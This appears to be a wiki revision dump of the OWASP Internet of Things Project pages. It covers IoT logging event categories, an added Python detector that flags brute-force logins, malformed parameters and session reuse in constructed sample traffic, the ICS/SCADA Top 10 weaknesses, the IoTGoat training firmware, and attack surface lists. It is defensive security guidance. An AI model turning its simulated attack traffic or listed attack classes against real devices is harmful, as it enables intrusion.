* Substituting Another User's Valid SessionID or Cookie<br />
* Source Location Changes During Session<br />
|-<br />
| '''Access Control Exceptions'''<br />
|<br />
* Modifying URL Argument Within a GET for Direct Object Access Attempt<br />
* Modifying Parameter Within a POST for Direct Object Access Attempt<br />
* Forced Browsing Attempt<br />
|-<br />
| '''Ecosystem Membership Exceptions'''<br />
|<br />
* Traffic Seen from Disenrolled System<br />
* Traffic Seen from Unenrolled System<br />
* Failed Attempt to Enroll in Ecosystem<br />
* Multiple Attempts to Enroll in Ecosystem<br />
|-<br />
| '''Device Access Events'''<br />
|<br />
* Device Case Tampering Detected<br />
* Device Logic Board Tampering Detected<br />
|-<br />
| '''Administrative Mode Events'''<br />
|<br />
* Device Entered Administrative Mode<br />
* Device Accessed Using Default Administrative Credentials<br />
|-<br />
| '''Input Exceptions'''<br />
|<br />
* Double Encoded Character<br />
* Unexpected Encoding Used<br />
|-<br />
| '''Command Injection Exceptions'''<br />
|<br />
* Blacklist Inspection for Common SQL Injection Values<br />
* Abnormal Quantity of Returned Records<br />
|-<br />
| '''Honey Trap Exceptions'''<br />
|<br />
* Honey Trap Resource Requested<br />
* Honey Trap Data Used<br />
|-<br />
| '''Reputation Exceptions'''<br />
|<br />
* Suspicious or Disallowed User Source Location<br />
<br />
|-<br />
|}<br />
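A detector for several of the events in the table, added here as an example that is not part of the OWASP project: it consumes a stream of device request records and emits one structured event per match, covering the Request, Authentication and Session exception categories. The record fields, thresholds and the sample records are assumptions constructed for this example.<br />
<br />
```python
"""Added example (not OWASP project code): emit the minimum IoT logging events from the
table above for a stream of device request records.  Field names, thresholds and the
sample records are assumptions constructed for this example."""
import re
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Assumed device policy (constructed for this example).
ALLOWED_METHODS = {"GET", "POST"}
PARAM_MAX_LEN = 64                                  # "Unexpected Quantity of Characters"
PARAM_CHARSET = re.compile(r"^[A-Za-z0-9_.:@-]*$")  # "Unexpected Type of Characters"
LOGIN_FIELDS = {"username", "password"}             # anything else: "Additional POST Variable"
FAILED_PASSWORD_LIMIT = 3                           # failures per username
LOGIN_RATE_LIMIT = 5                                # login attempts per source in the window
LOGIN_RATE_WINDOW = timedelta(seconds=60)


class IoTEventLogger:
    """Stateful detector: feed it request records in order, collect structured events."""

    def __init__(self):
        self.events = []
        self.failed_by_user = Counter()           # username -> consecutive failed passwords
        self.logins_by_src = defaultdict(list)    # source IP -> recent login timestamps
        self.session_src = {}                     # session id -> source IP it was first seen from

    def _emit(self, ts, category, event, **details):
        self.events.append({"ts": ts.isoformat(), "category": category, "event": event, **details})

    def process(self, r):
        ts = datetime.fromisoformat(r["ts"])
        src, method, path, params = r["src"], r["method"], r["path"], r.get("params", {})

        # Request Exceptions
        if method not in ALLOWED_METHODS:
            self._emit(ts, "Request Exceptions", "Attempt to Invoke Unsupported HTTP Method",
                       src=src, method=method, path=path)
        for name, value in params.items():
            if len(value) > PARAM_MAX_LEN:
                self._emit(ts, "Request Exceptions", "Unexpected Quantity of Characters in Parameter",
                           src=src, param=name, length=len(value))
            elif name != "password" and not PARAM_CHARSET.match(value):  # secrets may use any char
                self._emit(ts, "Request Exceptions", "Unexpected Type of Characters in Parameter",
                           src=src, param=name)

        # Authentication Exceptions (login endpoint only); the password itself is never logged
        if path == "/login" and method == "POST":
            extra = sorted(set(params) - LOGIN_FIELDS)
            if extra:
                self._emit(ts, "Authentication Exceptions", "Additional POST Variable",
                           src=src, fields=extra)
            recent = [t for t in self.logins_by_src[src] if ts - t <= LOGIN_RATE_WINDOW] + [ts]
            self.logins_by_src[src] = recent
            if len(recent) == LOGIN_RATE_LIMIT:   # fire once, when the limit is first reached
                self._emit(ts, "Authentication Exceptions", "High Rate of Login Attempts",
                           src=src, attempts=len(recent), window_s=LOGIN_RATE_WINDOW.seconds)
            user = params.get("username", "<missing>")
            if r.get("auth_ok"):
                self.failed_by_user[user] = 0
            else:
                self.failed_by_user[user] += 1
                if self.failed_by_user[user] == FAILED_PASSWORD_LIMIT:
                    self._emit(ts, "Authentication Exceptions", "Multiple Failed Passwords",
                               src=src, user=user, failures=FAILED_PASSWORD_LIMIT)

        # Session Exceptions: the same session id presented from a different source
        sid = r.get("session")
        if sid is not None:
            first = self.session_src.setdefault(sid, src)
            if first != src:
                self._emit(ts, "Session Exceptions", "Source Location Changes During Session",
                           session=sid, original_src=first, new_src=src)


# Constructed sample traffic: a benign request, three malformed ones, a burst of failed
# logins, a successful login carrying an extra field, then the session id reused elsewhere.
SAMPLE_RECORDS = [
    {"ts": "2019-11-01T07:00:00", "src": "10.0.0.5", "method": "GET", "path": "/status",
     "params": {"id": "cam-1"}, "session": "s1"},
    {"ts": "2019-11-01T07:00:01", "src": "10.0.0.5", "method": "TRACE", "path": "/status"},
    {"ts": "2019-11-01T07:00:02", "src": "10.0.0.5", "method": "GET", "path": "/status",
     "params": {"id": "x" * 80}},
    {"ts": "2019-11-01T07:00:03", "src": "10.0.0.5", "method": "GET", "path": "/status",
     "params": {"id": "cam 1?"}},
    *[{"ts": f"2019-11-01T07:01:{i:02d}", "src": "10.0.0.9", "method": "POST", "path": "/login",
       "params": {"username": "admin", "password": "guess"}, "auth_ok": False} for i in range(5)],
    {"ts": "2019-11-01T07:01:10", "src": "10.0.0.9", "method": "POST", "path": "/login",
     "params": {"username": "admin", "password": "secret", "role": "admin"}, "auth_ok": True},
    {"ts": "2019-11-01T07:02:00", "src": "10.0.0.7", "method": "GET", "path": "/status",
     "params": {"id": "cam-1"}, "session": "s1"},
]


def run(records=SAMPLE_RECORDS):
    """Process the records in order and return the structured events produced."""
    logger = IoTEventLogger()
    for r in records:
        logger.process(r)
    return logger.events   # one dict per event, ready to serialise as JSON lines
```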
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right: 25px;" valign="top" |<br />
<br />
== What is the IoT Security Logging Project? ==<br />
<br />
The IoT Secure Logging Project provides a list of core events that should be logged in any IoT-related system. The project exists because IoT systems in general log far too few events to feed a solid detection and response program around IoT devices, and companies that want to build such a program have few good resources describing what should be logged.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_AppSensor_Project The OWASP AppSensor Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
=ICS/SCADA=<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |<br />
==ICS/SCADA Project==<br />
The OWASP ICS/SCADA Top 10 software weaknesses are as follows:<br />
{| class="wikitable" border="1" style="text-align: left"<br />
!Rank and ID<br />
!Title<br />
|-<br />
|'''1 - CWE-119'''<br />
|<br />
*Improper Restriction of Operations within the Bounds of a Memory Buffer<br />
|-<br />
|'''2 - CWE-20'''<br />
|<br />
*Improper Input Validation<br />
|-<br />
|'''3 - CWE-22'''<br />
|<br />
*Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')<br />
|-<br />
|'''4 - CWE-264'''<br />
|<br />
*Permissions, Privileges, and Access Controls<br />
|-<br />
|'''5 - CWE-200'''<br />
|<br />
*Information Exposure<br />
|-<br />
|'''6 - CWE-255'''<br />
|<br />
*Credentials Management<br />
|-<br />
|'''7 - CWE-287'''<br />
|<br />
*Improper Authentication<br />
|-<br />
|'''8 - CWE-399'''<br />
|<br />
*Resource Management Errors<br />
|-<br />
|'''9 - CWE-79'''<br />
|<br />
*Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')<br />
|-<br />
|'''10 - CWE-189'''<br />
|<br />
*Numeric Errors<br />
|-<br />
|}{{Social Media Links}}<br />
| valign="top" style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" |<br />
==What is the ICS/SCADA Project?==<br />
The ICS/SCADA Project provides:<br />
*A list of the Top 10 most dangerous software weaknesses<br />
==Project Leaders==<br />
*NJ Ouchn<br />
==Related Projects==<br />
*[[OWASP Mobile Security Project|OWASP Mobile Security]]<br />
*[[OWASP Top Ten Project|OWASP Web Top 10]]<br />
==Collaboration==<br />
[https://owasp-iot-security.slack.com/ The Slack Channel]<br />
==Quick Download==<br />
*Coming Soon<br />
==News and Events==<br />
*Coming Soon<br />
|}<br />
<br />
= IoTGoat =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoTGoat Project ==<br />
<br />
IoTGoat will be a deliberately insecure firmware based on OpenWrt. The project’s goal is to teach users about the most common vulnerabilities typically found in IoT devices. The vulnerabilities will be based on the top 10 vulnerabilities as documented by OWASP: [[OWASP_Internet_of_Things_Project|OWASP Internet of Things Project]]<br />
<br />
To get more information on getting started, visit the project's GitHub: https://github.com/scriptingxss/IoTGoat<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoTGoat Project? ==<br />
<br />
The IoTGoat Project is a deliberately insecure firmware based on OpenWrt. The project’s goal is to teach users about the most common vulnerabilities typically found in IoT devices. The vulnerabilities will be based on the IoT Top 10.<br />
<br />
== GitHub ==<br />
https://github.com/scriptingxss/IoTGoat<br />
<br />
== Project Leaders ==<br />
<br />
* Aaron Guzman<br />
* Fotios Chantzis<br />
* [[User:Calderpwn|Paulino Calderon]]<br />
<br />
== Related Projects ==<br />
<br />
* WebGoat<br />
* Serverless Goat<br />
* NodeGoat<br />
* RailsGoat<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
[https://groups.google.com/forum/#!forum/iotgoat IoTGoat Google Group]<br />
<br />
== Quick Download ==<br />
* [https://docs.google.com/presentation/d/1SJfabCBxvC3GWnmBCqisO5pyLzkB1-EVcR7s8baT0dE/edit?usp=sharing Project Kick-off Slides]<br />
* [https://strozfriedberg.webex.com/recordingservice/sites/strozfriedberg/recording/playback/5529b228ac514bed8cc050a9dee0f0df Project Kick-off Meeting]<br />
* [https://docs.google.com/spreadsheets/d/1KXX2K7ikkve6wmdfAVu-sZONgKEBuAkRij_paJUgX2w/edit?usp=sharing Project Task List]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;"></div><br />
<br />
= Community =<br />
<br />
[https://www.iamthecavalry.org/ I Am The Cavalry] <br />
<br />
A global grassroots organization that is focused on issues where computer security intersects public safety and human life.<br />
<br />
Their areas of focus include:<br />
* Medical devices<br />
* Automobiles<br />
* Home Electronics<br />
* Public Infrastructure<br />
<br />
[https://otalliance.org Online Trust Alliance]<br />
<br />
Formed as an informal industry working group in 2005, today OTA is an Internal Revenue Service (IRS) approved 501c3 charitable organization with the mission to enhance online trust and empower users, while promoting innovation and the vitality of the internet. OTA is a global organization supported by over 100 organizations, headquartered in Bellevue, Washington, with offices in Washington DC.<br />
<br />
Addressing the mounting concerns, in January 2015 the Online Trust Alliance established the [https://otalliance.org/initiatives/internet-things IoT Trustworthy Working Group (ITWG)], a multi-stakeholder initiative. The group recognizes that “security and privacy by design” must be a priority from the onset of product development and be addressed holistically. The framework focuses on privacy, security and sustainability. The sustainability pillar is critical as it looks at the life-cycle issues related to long-term supportability and transfers of ownership of devices and the data collected.<br />
<br />
[https://allseenalliance.org/framework AllSeen Alliance]<br />
<br />
The AllSeen Alliance is a Linux Foundation collaborative project. They're a cross-industry consortium dedicated to enabling the interoperability of billions of devices, services and apps that comprise the Internet of Things. The Alliance supports the AllJoyn Framework, an open source software framework that makes it easy for devices and apps to discover and communicate with each other. Developers can write applications for interoperability regardless of transport layer, manufacturer, and without the need for Internet access. The software has been and will continue to be openly available for developers to download, and runs on popular platforms such as Linux and Linux-based Android, iOS, and Windows, including many other lightweight real-time operating systems.<br />
<br />
[http://www.iiconsortium.org/ The Industrial Internet Consortium (IIC)]<br />
<br />
The Industrial Internet Consortium is the open membership, international not-for-profit consortium that is setting the architectural framework and direction for the Industrial Internet. Founded by AT&T, Cisco, GE, IBM and Intel in March 2014, the consortium’s mission is to coordinate vast ecosystem initiatives to connect and integrate objects with people, processes and data using common architectures, interoperability and open standards.<br />
<br />
[http://securingsmartcities.org/ Securing Smart Cities]<br />
<br />
Securing Smart Cities is a not-for-profit global initiative that aims to solve the existing and future cybersecurity problems of smart cities through collaboration between companies, governments, media outlets, other not-for-profit initiatives and individuals across the world.<br />
<br />
===Talks===<br />
<br />
* RSA Conference San Francisco, April 21, 2015: [https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf Securing the Internet of Things: Mapping IoT Attack Surface Areas with the OWASP IoT Top 10 Project], Daniel Miessler, Practice Principal<br />
* Defcon 23, August 6-9, 2015: [https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping], Daniel Miessler<br />
<br />
===Podcasts===<br />
<br />
* [http://iotpodcast.com/ The Internet of Things Podcast]<br />
* [http://www.iot-inc.com/ IoT Inc]<br />
* [https://craigsmith.net/iot-this-week/ IoT This Week]<br />
* [http://farstuff.com/ Farstuff: The Internet of Things Podcast]<br />
<br />
===IoT Conferences===<br />
<br />
* [http://www.iotevents.org Internet of Things Events]<br />
<br />
Conference Call for Papers<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=internet+of+things&year=t WikiCFP - Internet of Things]<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=iot&year=t WikiCFP - IoT]<br />
<br />
<br />
<br />
=Project About=<br />
<br />
{{Template:Project About<br />
| project_name =OWASP Internet of Things Project<br />
| project_description = <br />
| project_license =CC-BY 3.0 for documentation and GPLv3 for code. <br />
| leader_name1 = Daniel Miessler<br />
| leader_email1 = <br />
| leader_username1 = <br />
| leader_name2 =Craig Smith<br />
| leader_email2 = <br />
| leader_username2 = <br />
| contributor_name1 = Justin Klein Keane<br />
| contributor_email1 = <br />
| contributor_username1 = Justin_C._Klein_Keane<br />
| contributor_name2 = Yunsoul<br />
| contributor_email2 = <br />
| contributor_username2 = Yunsoul<br />
| mailing_list_name = <br />
| links_url1 = <br />
| links_name1 =<br />
}} <br />
<br />
<br />
<br />
__NOTOC__ <headertabs></headertabs><br />
<br />
[[Category:OWASP_Project]] <br />
[[Category:OWASP_Document]] <br />
[[Category:OWASP_Download]] <br />
[[Category:OWASP_Release_Quality_Document]]</div>
Aaron.guzman
https://wiki.owasp.org/index.php?title=OWASP_Internet_of_Things_Project&diff=250074
OWASP Internet of Things Project
2019-04-12T20:38:44Z
<p>Aaron.guzman: /* GitBook */</p>
<hr />
<div>= Main =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
== OWASP Internet of Things (IoT) Project ==<br />
Oxford defines the Internet of Things as: “A proposed development of the Internet in which everyday objects have network connectivity, allowing them to send and receive data.”<br />
<br />
''The OWASP Internet of Things Project is designed to help manufacturers, developers, and consumers better understand the security issues associated with the Internet of Things, and to enable users in any context to make better security decisions when building, deploying, or assessing IoT technologies''. <br />
<br />
The project looks to define a structure for various IoT sub-projects such as Attack Surface Areas, Testing Guides and Top Vulnerabilities.<br />
<br />
==Updated!==<br />
<br />
The OWASP IoT Project for 2018 has been released![[File:OWASP 2018 IoT Top10 Final.jpg|center|thumb|1301x1301px]]<br />
<br />
== Philosophy ==<br />
The OWASP Internet of Things Project was started in 2014 as a way to help Developers, Manufacturers, Enterprises, and Consumers make better decisions regarding the creation and use of IoT systems.<br />
<br />
This continues today with the 2018 release of the OWASP IoT Top 10, which represents the top ten things to avoid when building, deploying, or managing IoT systems. The primary theme for the 2018 OWASP Internet of Things Top 10 is simplicity. Rather than having separate lists for risks vs. threats vs. vulnerabilities—or for developers vs. enterprises vs. consumers—the project team elected to have a single, unified list that captures the top things to avoid when dealing with IoT Security.<br />
<br />
The team recognized that there are now dozens of organizations releasing elaborate guidance on IoT Security—all of which are designed for slightly different audiences and industry verticals. We thought the most useful resource we could create is a single list that addresses the highest priority issues for manufacturers, enterprises, and consumers at the same time.<br />
<br />
The result is the [https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf 2018 OWASP IoT Top 10].<br />
<br />
== Methodology ==<br />
The project team is a collection of volunteer professionals from within the security industry, with experience spanning multiple areas of expertise, including: manufacturers, consulting, security testers, developers, and many more.<br />
<br />
The project was conducted in the following phases:<br />
# '''Team Formation''': finding people who would be willing to contribute to the 2018 update, both as SMEs and as project leaders to perform various tasks within the duration of the project.<br />
# '''Project Review:''' analysis of the 2014 project to determine what’s changed in the industry since that release, and how the list should be updated given those changes.<br />
# '''Data Collection''': collection and review of multiple vulnerability sources (both public and private), with special emphasis on which issues caused the most actual impact and damage.<br />
# '''Sister Project Review''': a review of dozens of other IoT Security projects to ensure that we’d not missed something major and that we were comfortable with both the content and prioritization of our release. Examples included: [https://cloudsecurityalliance.org/artifacts/csa-iot-controls-matrix/ CSA IoT Controls Matrix], [https://api.ctia.org/wp-content/uploads/2018/08/CTIA-IoT-Cybersecurity-Certification-Test-Plan-V1_0.pdf CTIA], [http://iot.stanford.edu/ Stanford’s Secure Internet of Things Project], [https://nvlpubs.nist.gov/nistpubs/ir/2018/NIST.IR.8200.pdf NISTIR 8200], [https://www.enisa.europa.eu/publications/baseline-security-recommendations-for-iot/at_download/fullReport ENISA IoT Baseline Report], [https://assets.publishing.service.gov.uk/government/uploads/system/uploads/attachment_data/file/747413/Code_of_Practice_for_Consumer_IoT_Security_October_2018.pdf Code of Practice for Consumer IoT Security], and others.<br />
# '''Community Draft Feedback''': release of the draft to the community for review, including multiple Twitter calls for comments, the use of a public feedback form, and a number of public talks where feedback was gathered. The feedback was then reviewed by the team along with initial Data Collection, as well as Sister Project Review, to create the list contents and prioritization.<br />
# '''Release:''' release of the project to the public in December 2018.<br />
<br />
== The Future of the OWASP IoT Top 10 ==<br />
The team has a number of activities planned to continue improving on the project going forward.<br />
<br />
Some of the items being discussed include:<br />
* Continuing to improve the list on a two-year cadence, incorporating feedback from the community and from additional project contributors to ensure we are staying current with issues facing the industry.<br />
* Mapping the list items to other OWASP projects, such as the ASVS, and perhaps to other projects outside OWASP as well.<br />
* Expanding the project into other aspects of IoT—including embedded security, ICS/SCADA, etc.<br />
* Adding use and abuse cases, with multiple examples, to solidify each concept discussed.<br />
* Considering the addition of reference architectures, so we can not only tell people what to avoid, but how to do what they need to do securely.<br />
<br />
Participation in the OWASP IoT Project is open to the community. We take input from all participants — whether you’re a developer, a manufacturer, a penetration tester, or someone just trying to implement IoT securely. You can find the team meeting every other Friday in the #iot-security room of the OWASP Slack Channel.<br />
<br />
'''''The OWASP IoT Security Team, 2018'''''<br />
<br />
==Licensing==<br />
The OWASP Internet of Things Project is free to use. It is licensed under the [http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, adapt it, and use it commercially, provided that you attribute the work and that, if you alter, transform, or build upon it, you distribute the resulting work only under the same or a similar license.<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the OWASP Internet of Things Project? ==<br />
<br />
The OWASP Internet of Things Project provides information on:<br />
<br />
* [https://www.owasp.org/index.php/IoT_Attack_Surface_Areas IoT Attack Surface Areas]<br />
* IoT Vulnerabilities<br />
* Firmware Analysis<br />
* ICS/SCADA Software Weaknesses<br />
* Community Information<br />
* [https://www.owasp.org/index.php/IoT_Testing_Guides IoT Testing Guides]<br />
* [https://www.owasp.org/index.php/IoT_Security_Guidance IoT Security Guidance]<br />
* [https://www.owasp.org/index.php/Principles_of_IoT_Security Principles of IoT Security]<br />
* [https://www.owasp.org/index.php/IoT_Framework_Assessment IoT Framework Assessment]<br />
* Developer, Consumer and Manufacturer Guidance<br />
* Design Principles<br />
* IoTGoat<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
* Vishruta Rudresh<br />
* Aaron Guzman<br />
<br />
== Contributors ==<br />
* [https://www.owasp.org/index.php/User:Justin_C._Klein_Keane Justin Klein Keane]<br />
* Saša Zdjelar<br />
<br />
== IoT Top 10 2018 Contributors ==<br />
* Vijayamurugan Pushpanathan <br />
* Alexander Lafrenz <br />
* Masahiro Murashima <br />
* Charlie Worrell <br />
* José A. Rivas (jarv) <br />
* Pablo Endres <br />
* Ade Yoseman <br />
* Cédric Levy-Bencheton<br />
* Jason Andress<br />
* Amélie Didion - Designer<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Project|OWASP Project Repository]]<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security]<br />
* [https://www.owasp.org/index.php/C-Based_Toolchain_Hardening OWASP C-based Toolchain Hardening]<br />
<br />
| style="padding-left:25px;width:200px;" valign="top" |<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The OWASP Slack Channel]<br />
<br />
Hint: If you're new to Slack, [https://lists.owasp.org/pipermail/owasp-community/2015-July/000703.html join OWASP's slack channel first], then join #iot-security within OWASP's channel.<br />
<br />
== Quick Download ==<br />
[https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top Ten 2018]<br />
<br />
[https://www.owasp.org/images/7/7b/IoT_Preso_v1.pptx Quick discussion on IoT]<br />
<br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping DEFCON 23]<br />
<br />
[https://www.owasp.org/images/2/2d/Iot_testing_methodology.JPG IoT Testing Guidance Handout]<br />
<br />
[https://www.owasp.org/images/7/71/Internet_of_Things_Top_Ten_2014-OWASP.pdf OWASP IoT Top Ten 2014 PDF]<br />
<br />
[https://www.owasp.org/images/8/8e/Infographic-v1.jpg OWASP IoT Top Ten 2014 Infographic]<br />
<br />
[https://www.owasp.org/images/0/01/Internet_of_Things_Top_Ten_2014-OWASP-ppt.pptx OWASP IoT Top Ten 2014 PPT]<br />
<br />
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf OWASP IoT Top Ten-RSA 2015]<br />
<br />
[https://www.owasp.org/images/b/bd/OWASP-IoT.pptx OWASP IoT Project Overview]<br />
<br />
== News and Events ==<br />
* OWASP [https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project#tab=IoTGoat IoTGoat Project] underway<br />
* IoT ASVS and Testing Guide set to kick off in 2019<br />
* Added a [https://owasp-iot-security.slack.com/ Slack channel]<br />
* Added a sub-project: [https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project#tab=IoT_Security_Policy_Project IoT Security Policy Project]<br />
<br />
==Classifications==<br />
<br />
{| width="200" cellpadding="2"<br />
|-<br />
| rowspan="2" width="50%" valign="top" align="center" | [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]<br />
| width="50%" valign="top" align="center" | [[File:Owasp-builders-small.png|link=]] <br />
|-<br />
| width="50%" valign="top" align="center" | [[File:Owasp-defenders-small.png|link=]]<br />
|-<br />
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]<br />
|-<br />
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]<br />
|}<br />
<br />
|}<br />
<br />
= IoT Top 10 =<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
== Internet of Things (IoT) Top 10 2018 ==<br />
The [https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top 10 - 2018] is now available.<br />
* I1 Weak, Guessable, or Hardcoded Passwords<br />
* I2 Insecure Network Services<br />
* I3 Insecure Ecosystem Interfaces<br />
* I4 Lack of Secure Update Mechanism<br />
* I5 Use of Insecure or Outdated Components<br />
* I6 Insufficient Privacy Protection<br />
* I7 Insecure Data Transfer and Storage<br />
* I8 Lack of Device Management<br />
* I9 Insecure Default Settings<br />
* I10 Lack of Physical Hardening<br />
== Internet of Things (IoT) Top 10 2014 ==<br />
* [[Top 10 2014-I1 Insecure Web Interface|I1 Insecure Web Interface]]<br />
* [[Top 10 2014-I2 Insufficient Authentication/Authorization|I2 Insufficient Authentication/Authorization]]<br />
* [[Top 10 2014-I3 Insecure Network Services|I3 Insecure Network Services]]<br />
* [[Top 10 2014-I4 Lack of Transport Encryption|I4 Lack of Transport Encryption]]<br />
* [[Top 10 2014-I5 Privacy Concerns|I5 Privacy Concerns]]<br />
* [[Top 10 2014-I6 Insecure Cloud Interface|I6 Insecure Cloud Interface]]<br />
* [[Top 10 2014-I7 Insecure Mobile Interface|I7 Insecure Mobile Interface]]<br />
* [[Top 10 2014-I8 Insufficient Security Configurability|I8 Insufficient Security Configurability]]<br />
* [[Top 10 2014-I9 Insecure Software/Firmware|I9 Insecure Software/Firmware]]<br />
* [[Top 10 2014-I10 Poor Physical Security|I10 Poor Physical Security]]<br />
<br />
= OWASP IoT Top 10 2018 Mapping Project =<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Top 10 2018 Mapping Project ==<br />
<br />
The OWASP IoT Mapping Project is intended to provide a mapping of the OWASP IoT Top 10 2018 to industry publications and sister projects. The goal is to provide resources that enable practical uses for the OWASP IoT Top 10. As with all Top 10 lists, it should be used as a first step and expanded upon according to the applicable IoT ecosystem.<br />
<br />
Mappings are structured with control categories, tests, or recommendations in the left column, descriptions in the middle column, and their mapping to the OWASP IoT Top 10 2018 list in the right column. Each mapping may not have a 1 to 1 relation; however, similar recommendations and/or controls are listed. For mappings that are not applicable to the IoT Top 10 2018 list, an "N/A" is provided as the mapping.<br />
<br />
An example mapping of the IoT Top 10 2014 is provided below. <br />
<br />
[[File:2014 2018Mapping.png|center|frameless|746x746px]]<br />
<br />
For additional mappings, please visit the following link: https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/<nowiki/>{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Top 10 Mapping Project? ==<br />
<br />
The OWASP IoT Mapping Project is intended to provide a mapping of the OWASP IoT Top 10 2018 to industry publications and sister projects. The goal is to provide resources that enable practical uses for the OWASP IoT Top 10. As with all Top 10 lists, it should be used as a first step and expanded upon according to the applicable IoT ecosystem.<br />
<br />
Mappings include the following:<br />
* [https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/mappings/owasp-iot-top-10-2014 OWASP IoT Top 10 2014]<br />
* [https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/mappings/gsma-iot-security-assessment-checklist GSMA IoT Security Assessment Checklist]<br />
* [https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/mappings/code-of-practice Code of Practice (UK Government)]<br />
* [https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/mappings/enisa-baseline-security-recommendations-for-iot ENISA Baseline Security Recommendations for IoT]<br />
<br />
and more...<br />
<br />
== GitBook ==<br />
Mappings are hosted on GitBook at the following link: https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/<br />
<br />
== Project Leaders ==<br />
<br />
* Aaron Guzman<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
|}<br />
= IoT Attack Surface Areas =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Attack Surface Areas Project ==<br />
<br />
The OWASP IoT Attack Surface Areas (DRAFT) are as follows:<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
** UART (Serial)<br />
** JTAG / SWD<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
